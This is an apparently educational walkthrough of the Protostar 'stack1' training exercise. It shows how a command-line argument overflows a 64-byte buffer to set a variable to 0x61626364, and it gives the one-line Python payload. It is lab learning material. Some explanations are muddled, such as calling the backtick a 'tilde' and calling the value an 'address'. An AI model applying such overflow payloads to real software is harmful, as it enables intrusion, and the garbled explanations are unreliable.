Hello hackers! hope you are all doing well today. Now that we have done stack-0 and have a basic idea of how a stack frame is built, we can move on to stack-1.
SOURCE CODE:
/opt/protostar/bin/stack1:
Let us analyze the given code, seems like a modified variable is created first and then pushed down the stack and a buffer of space 64 is created. Pretty much like stack 0. You can refer the stack 0 from my previous write-up by clicking here :). But here we see there is NO gets function, so where exactly can we inject our payload?!.
When we run the code we get asked for an argument. We can see it in the code itself.
So that’s gonna be our way in to inject our payload. In order to pass an argument, we can either use a tilde operator (“ ` ")or a (“ $ ”) symbol
Now our error message is different from the first time,so clearly we can pass our payload as an argument . Now what to do next. Let us have a look at our code. It has a condition that says ‘modified= 0x61626364’. So that's how we get to the modified space. Now our payload is going to be:
./stack1 $(python -c ‘print “A”*64 + “\x64\x63\x62\x61”’)
Our payload says the program to fill the buffer space 64 times with random characters (A according to my payload) and then specify the address of the modified variable.
You might wonder why we used 64 bytes instead of 65 bytes like the last time. Well here is the reason. In the last question, we just needed to overwrite the buffer space and stand on top of the modified space and that will print us the required output. But in this payload, we print exactly 64 times so that we overwrite buffer space and stand on the starting line of modified space and then we can give the correct address to the modified space to get our required output :D.
That is going to be a walkthrough of stack 1. Hope you have understood the concept clearly. More of the stack walkthroughs are yet to be released, until then take care, bye bye :).
